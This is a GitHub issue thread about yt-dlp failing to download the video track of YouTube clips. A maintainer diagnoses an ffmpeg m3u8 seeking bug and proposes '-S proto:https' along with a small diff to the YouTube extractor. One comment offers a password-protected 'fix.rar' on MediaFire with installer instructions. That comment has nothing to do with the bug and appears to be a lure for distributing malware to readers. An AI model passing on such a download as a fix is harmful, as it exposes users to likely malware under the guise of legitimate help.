### ISSUE TITLE
YouTube clips fail to download video

### ISSUE THREAD

**Issue by Avenred** [yt-dlp/yt-dlp#10856]
### DO NOT REMOVE OR SKIP THE ISSUE TEMPLATE

- [X] I understand that I will be **blocked** if I *intentionally* remove or skip any mandatory\* field

### Checklist

- [X] I'm reporting a bug unrelated to a specific site
- [X] I've verified that I have **updated yt-dlp to nightly or master** ([update instructions](https://github.com/yt-dlp/yt-dlp#update-channels))
- [X] I've checked that all provided URLs are playable in a browser with the same IP and same login details
- [X] I've checked that all URLs and arguments with special characters are [properly quoted or escaped](https://github.com/yt-dlp/yt-dlp/wiki/FAQ#video-url-contains-an-ampersand--and-im-getting-some-strange-output-1-2839-or-v-is-not-recognized-as-an-internal-or-external-command)
- [X] I've searched [known issues](https://github.com/yt-dlp/yt-dlp/issues/3766) and the [bugtracker](https://github.com/yt-dlp/yt-dlp/issues?q=) for similar issues **including closed ones**. DO NOT post duplicates
- [X] I've read the [guidelines for opening an issue](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#opening-an-issue)

### Provide a description that is worded well enough to be understood

When downloading a clipped video (from a https://youtube.com/clip/ link), the video fails to download. If you use `-f bestvideo+bestaudio`, it downloads the audio but leaves you with a blank video.

### Provide verbose output that clearly demonstrates the problem

- [X] Run **your** yt-dlp command with **-vU** flag added (`yt-dlp -vU <your command line>`)
- [ ] If using API, add `'verbose': True` to `YoutubeDL` params instead
- [X] Copy the WHOLE output (starting with `[debug] Command-line config`) and insert it below

### Complete Verbose Output

```shell
https://pastebin.com/raw/p4tic2jd
```

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Black-Platypus** [comment]
Having the same problem: 
[yt-dlp.log](https://github.com/user-attachments/files/16804411/yt-dlp.log)

@seproDev What's this in reference to?

**Comment by bashonly** [comment]
This is a side effect of a bug in ffmpeg where it fails seek in Youtube's m3u8 streams:
- https://github.com/yt-dlp/yt-dlp/issues/7824
(Github has unhelpfully "hidden" this issue, but it's listed in the "Pinned Issues" thread as a known external issue)

The example videos from the log have the enhanced bitrate 1080p format 616 available, which yt-dlp selects by default. This is one of the m3u8 formats that ffmpeg has a problem with.

The workaround/solution is to select an https protocol format, e.g. using format sorting: `-S proto:https`

We could also make this the default sort preference for all Youtube clips:

```diff
diff --git a/yt_dlp/extractor/youtube.py b/yt_dlp/extractor/youtube.py
index 2501398ba..8c578bdeb 100644
--- a/yt_dlp/extractor/youtube.py
+++ b/yt_dlp/extractor/youtube.py
@@ -7538,6 +7538,8 @@ def _real_extract(self, url):
             'id': clip_id,
             'section_start': int(clip_data['startTimeMs']) / 1000,
             'section_end': int(clip_data['endTimeMs']) / 1000,
+            '_format_sort_fields': (  # https protocol is prioritized for ffmpeg compatibility
+                'proto:https', 'quality', 'res', 'fps', 'hdr:12', 'source', 'vcodec:vp9.2', 'channels', 'acodec', 'lang'),
         }
 
 
```

**Comment by Hrxn** [comment]
Does this mean that the format 616 (if available) will *not* be the selected default anymore?

**Comment by bashonly** [comment]
only for clips, because it won't work
